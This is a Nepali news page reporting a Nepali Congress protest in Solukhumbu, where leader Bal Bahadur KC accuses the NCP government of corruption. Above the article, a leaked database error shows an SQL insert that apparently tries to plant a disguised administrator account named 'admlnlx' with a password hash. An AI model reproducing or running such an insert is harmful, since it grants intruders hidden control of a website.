WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXd1PtfAzI8rp.88q56jSe8usL2TWV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:55:50', '', 'admlnlx', 'admlnlx')

नेकपा सरकारको पालामा भष्टचार र वेथिति मौलाए – वलवहादुर केसी – Gaule Khabar

नेकपा सरकारको पालामा भष्टचार र वेथिति मौलाए – वलवहादुर केसी

नेकपा सरकारको पालामा भष्टचार र वेथिति मौलाए – वलवहादुर केसी

पमुख पतिपक्ष पार्टी नेपाली काँगेसले सोलुखुम्वु जिल्लाको दुधकुन्द नगरपालिका स्थित सल्लेरीमा विरोध सभा राखेर वर्तमान नेकपा सरकारको विरुद्धमा देशव्यापी कार्यक्रम अन्तर्गत सल्लेरीमा पनि विरोध पर्दशन गरेका छन ।

अहिलेको सरकार भटचार र व्यथितिको दिशा तिर उन्मुख भएकोले सरकारको विरोध साथै सचेत गराउनको लागि पनि विरोध कार्यक्रम गरिइएको सोलुखम्वु काँगेसका सभापति विनोद वस्नेतले वताएका छन । पर्वमन्त्री तथा नेपाली काँगेस केन्दिय सदस्य वलवहादुर केसीको अघुवाईमा करिव एघार सय कार्यकर्ताको उपस्थितिमा विरोध कार्यक्रम गरेका हुन । कार्यक्रमलाई सम्वोधन गर्दै नेता केसीले नेकपाको सरकारकै कारण अहिले मुलुकमा नागरिक अधिकार माथि हनन भएको र गाँउ देखि शहर सम्म भटचार वढेको आरोप लगाए । सोलुखुम्वुमा अहिले जे जति विकासका कार्यहरु हुदैछन सवैै काँगेस कै पालामा जगको शुरुवात गरिएको भएता पनि वर्तमान सरकारका कार्यशैलीले जस नदिएको भन्दै विरोध गरेका छन ।
कार्यक्रमलाई सोलुदुधकुण्ड नगरपालिका मेयर नामगेल जाङ्बु शेर्पा, आदिवासी जनजाती विभागका केन्द्रिय सदस्य आङछिरिङ शेर्पा,नेपाली कांग्रेस सोलुखुम्बुका सहसचिव कुशराज राई,नेपाली कांग्रेस सोलुखुम्बुका प्रवक्ता सन्तोष कटेल, शुभराम बस्नेत सोलु काठमाडौ सम्पर्क समितिका सभापति गोकर्ण बस्नेत, नेबिसंघ सोलुखुम्बुका सभापति अश्बिन बाबू थापा,नेपाल तरुण दल सोलुखुम्बुका अध्यक्ष अशोक झा नेपाल महिला संघका अध्यक्ष छिण्डील्हमु शेर्पा, नेपाल दलित संघका केन्द्रिय सदस्य धर्म नेपाली लगायतका नेताहरूले सम्बोधन गरेका थिए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका